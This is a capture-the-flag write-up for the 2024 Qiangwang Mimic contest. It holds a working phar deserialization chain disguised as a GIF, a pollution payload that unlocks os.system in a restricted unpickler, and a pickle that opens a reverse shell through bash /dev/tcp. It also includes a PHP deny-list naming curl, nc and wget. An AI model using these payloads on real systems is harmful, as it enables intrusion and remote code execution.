强网拟态2024 (Qiangwang Mimic 2024)
capoo
From the source, the page first reads a file and base64-encodes it:
```php
<?php
class CapooObj {
    public function __wakeup()
    {
        // Runs whenever a CapooObj is unserialized; the only guard is a deny-list on the command string
        $action = $this->action;
        $action = str_replace("\"", "", $action);
        $action = str_replace("\'", "", $action);
        $banlist = "/(flag|php|base|cat|more|less|head|tac|nl|od|vi|sort|uniq|file|echo|xxd|print|curl|nc|dd|zip|tar|lzma|mv|www|\~|\`|\r|\n|\t|\ |\^|ls|\.|tail|watch|wget|\||\;|\:|\(|\)|\{|\}|\*|\?|\[|\]|\@|\\|\=|\<)/i";
        if(preg_match($banlist, $action)){
            die("Not Allowed!");
        }
        system($this->action);
    }
}
header("Content-type:text/html;charset=utf-8");
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['capoo'])) {
    $file = $_POST['capoo'];
    // file_exists() honours stream wrappers, so a phar:// path has its metadata unserialized here
    if (file_exists($file)) {
        $data = file_get_contents($file);
        $base64 = base64_encode($data);
    } else if (substr($file, 0, strlen("http://")) === "http://") {
        // Remote download branch: the only content check is a literal, case-sensitive "PILER"
        $data = file_get_contents($_POST['capoo'] . "/capoo.gif");
        if (strpos($data, "PILER") !== false) {
            die("Capoo piler not allowed!");
        }
        file_put_contents("capoo_img/capoo.gif", $data);
        die("Download Capoo OK");
    } else {
        die('Capoo does not exist.');
    }
} else {
    die('No capoo provided.');
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Display Capoo</title>
</head>
<body>
<img style='display:block; width:100px;height:100px;' id='base64image'
src='data:image/gif;base64, <?php echo $base64;?>' />
</body>
</html>
```
Unintended solution: read start.sh, find the flag's filename, then read it directly.
```sh
#!/bin/sh
rm -f /docker-entrypoint.sh
# Get the user
user=$(ls /home)
# Check the environment variables for the flag and assign to INSERT_FLAG
# Note: the statements below overwrite the FLAG-related environment variables; adjust them if needed
#if [ "$DASFLAG" ]; then
# INSERT_FLAG="$DASFLAG"
# export DASFLAG=no_FLAG
# DASFLAG=no_FLAG
#elif [ "$FLAG" ]; then
# INSERT_FLAG="$FLAG"
# export FLAG=no_FLAG
# FLAG=no_FLAG
#elif [ "$GZCTF_FLAG" ]; then
# INSERT_FLAG="$GZCTF_FLAG"
# export GZCTF_FLAG=no_FLAG
# GZCTF_FLAG=no_FLAG
#else
# INSERT_FLAG="flag{TEST_Dynamic_FLAG}"
#fi
# Write the FLAG to a file; modify as needed
#echo $INSERT_FLAG | tee /flag
#touch /flag
chmod 744 /flag-33ac806f
php-fpm & nginx &
echo "Running..."
tail -F /var/log/nginx/access.log /var/log/nginx/error.log
```
Intended solution (worked out after the contest):
With such an obvious file upload point and such a filter, this is clearly meant to be phar deserialization.
```php
<?php
// Generate with phar writes enabled: php -d phar.readonly=0 gen.php
class CapooObj {
    public $action;
    public function __construct($action){
        $this->action = $action;
    }
}
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'test');
// GIF header first so the file passes as an image; the stub only has to contain __HALT_COMPILER();
$phar->setStub("GIF89a" . "<script language='php'>__HALT_COMPILER();</script>");
// The metadata is what gets unserialized when file_exists() touches the phar:// path
$phar->setMetadata(new CapooObj("whoami"));
$phar->stopBuffering();
```
gzip the generated file (this also hides the "PILER" string from the download check), rename it to capoo.gif and host it on a server; the first POST uses the http:// branch to download it.
The second POST triggers it directly: capoo=phar://capoo_img/capoo.gif
ez_pickler
The challenge name makes it obvious this is pickle. The first thing I noticed was a merge() that looks just like prototype pollution in Node.js, which I learned on the spot.
Pollute secret_key first, then pollute safe_names and safe_modules:
```json
{
    "username": 1,
    "password": 1,
    "__init__": {
        "__globals__": {
            "safe_modules": [
                "os", "builtins", "eval", "json", "datetime", "math", "collections"
            ],
            "safe_names": [
                "sqrt", "exec", "system", "pow", "sin", "cos", "tan", "date", "datetime", "timedelta", "timezone", "loads", "dumps", "namedtuple", "deque", "Counter", "defaultdict", "eval", "echo", "popen"
            ],
            "secret_key": 111
        }
    }
}
```
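How a recursive merge() lets that JSON rewrite the unpickler's allow-list, as an added example that is not the challenge's code: the merge() below is an assumed reconstruction of the pattern the writeup describes (the challenge's own merge() is not shown), and the User class, the SAFE_MODULES / SECRET_KEY globals standing in for safe_modules / secret_key, and the request body are constructed. It also shows a hardened merge that refuses the dunder keys the chain depends on.

```python
SAFE_MODULES = ["math"]          # allow-list a restricted unpickler's find_class() consults
SECRET_KEY = "original-secret"   # constructed value, stands in for the app's secret_key

class User:
    def __init__(self, username, password):
        self.username = username
        self.password = password

def merge(src, dst):
    """Vulnerable merge (assumed reconstruction): follows any key, dunders included."""
    for k, v in src.items():
        if hasattr(dst, "__getitem__"):
            if dst.get(k) and isinstance(v, dict):
                merge(v, dst.get(k))
            else:
                dst[k] = v                      # overwrites an existing global here
        elif hasattr(dst, k) and isinstance(v, dict):
            merge(v, getattr(dst, k))           # "__init__" -> bound method -> "__globals__"
        else:
            setattr(dst, k, v)

def safe_merge(src, dst):
    """Hardened merge: plain non-dunder string keys only, and never recurse via getattr."""
    for k, v in src.items():
        if not isinstance(k, str) or k.startswith("__"):
            raise ValueError(f"refusing to merge key {k!r}")
        if isinstance(dst, dict) and isinstance(dst.get(k), dict) and isinstance(v, dict):
            safe_merge(v, dst[k])
        elif isinstance(dst, dict):
            dst[k] = v
        else:
            setattr(dst, k, v)

# Constructed request body shaped like the writeup's JSON; the chain lands in this module's globals dict.
POLLUTION = {"username": 1, "password": 1,
             "__init__": {"__globals__": {"SAFE_MODULES": ["os", "math"],
                                          "SECRET_KEY": 111}}}

def pollute(payload):
    """Run the vulnerable merge on a fresh User and return the globals it overwrote."""
    merge(payload, User("u", "p"))
    return SAFE_MODULES, SECRET_KEY

def hardened_rejects(payload):
    try:
        safe_merge(payload, User("u", "p"))
    except ValueError:
        return True
    return False
```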
Write the pickle file:
```python
import pickle
import os

class Test:
    def __reduce__(self):
        # os.system(...) runs when the pickle is loaded
        return (os.system, ("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'",))

test = Test()
a = pickle.dumps(test)
print(a)
with open('test.pkl', 'wb') as file:
    file.write(a)
```
I can't find the flag screenshot any more, only the one from right after the shell connected; I stupidly grabbed the flag without looking at its path.
spreader
Didn't understand it; I'll study it later. I'm never good at XSS.
OnlineRunner
I'll study this later together with the Java material.